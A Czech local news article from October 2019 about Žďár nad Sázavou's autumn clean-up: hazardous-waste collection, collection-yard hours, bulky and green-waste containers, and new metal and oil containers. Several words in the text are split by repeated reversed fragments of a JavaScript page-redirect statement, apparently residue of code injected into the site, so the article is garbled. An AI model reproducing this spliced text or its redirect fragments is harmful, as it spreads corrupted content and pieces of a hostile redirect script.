Rainbow page separator

Žďár čeká podzimní úklid města, v ulicích se objeví kontejnery

Středa, 2. října 2019

Žďár nad Sázavou / Podzimní úklid se ve dnech 10. až 25. října uskuteční ve žďárských ulicích. První tři dny dojde ke svozu nebezpečného odpadu, kdy je podle harmonogramu zveřejněného na webu Žďáru možné odložit odpady s nebezpečnými vlastnostmi i vysloužilé elektrospotřebiče. Obyvatelé mají odpady předávat pracovníkům svozové společnosti přímo na stanovištích. Později je možné nebezpečné i veškeré další odpady uložit ve sběrném dvoře v Jihlavské ulici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy od pondělí do pátku mezi 6. a 17. hodinou a v sobotu od 7 do 13 hodin. Od 14. do 25. října se po městě opět objeví rozměrné kontejnery na objemný odpad a na odpad ze zeleně. Objemný odpad skončí na skládce komunálního odpadu v Ronově nad Sázavou, odpad ze zeleně ve žďárské bioplynové stanici.
Nádoby na bioodpad ve žďárských ulicích se budou až do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu vyvážet jednou týdně, v osadách jednou za čtrnáct dní. Stále ještě jsou k dispozici biopopelnice pro zájemce, kteří tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možnost dosud nevyužili. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se ve Žďáře nově objevily rovněž kontejnery určené na kovy – zatím je jich deset, stejně jako nových nádob na použité oleje, přičemž seznam jejích rozmístění je taktéž zveřejněn na webu Žďáru.